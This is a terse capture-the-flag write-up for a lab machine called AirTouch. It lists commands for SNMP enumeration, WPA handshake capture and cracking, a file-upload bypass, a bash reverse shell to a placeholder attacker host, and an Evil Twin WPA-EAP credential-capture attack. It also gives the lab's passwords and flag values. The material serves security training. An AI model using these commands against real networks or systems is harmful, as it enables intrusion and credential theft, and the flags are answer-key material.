Overview
AirTouch is a hard machine focused on enterprise WiFi security. The attack chain involves SNMP enumeration, WPA handshake capture, web exploitation, and an Evil Twin WPA-EAP attack.
SNMP Enumeration
SNMP service was exposed with public community string.
nmap -sU -p161 10.129.X.X
consultant : RxBlZhLmOkacNWScmZ6D
Initial Access (SSH)
ssh consultant@10.129.X.X
Access to system obtained with wireless auditing tools installed.
WPA Handshake Capture
airmon-ng start wlan2
airodump-ng wlan2mon
aireplay-ng --deauth 10
Handshake successfully captured.
Cracking WPA Key
aircrack-ng -w rockyou.txt capture.cap
KEY FOUND → challenge
Web Exploitation
Privilege escalation via cookie manipulation.
Upload Bypass
curl -F "file=@shell.php;filename=shell.phtml"
Reverse Shell
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
uid=33(www-data)
Privilege Escalation
user : JunDRDZKHDnpkpDDvay
User Flag: 07b869416a1dfc1cda7b83eb96ea8567
Root - Evil Twin Attack
eaphammer --creds -i wlan3 -e "AirTouch-Office"
hashcat -m 5500 hash rockyou.txt
password → laboratory
Root Flag: 10bf0a886515c3679fd791b9aa4d015c
Summary
- SNMP → Credentials leak
- WPA → Handshake cracked
- Web → Upload bypass
- Router → Hardcoded creds
- Evil Twin → Credential capture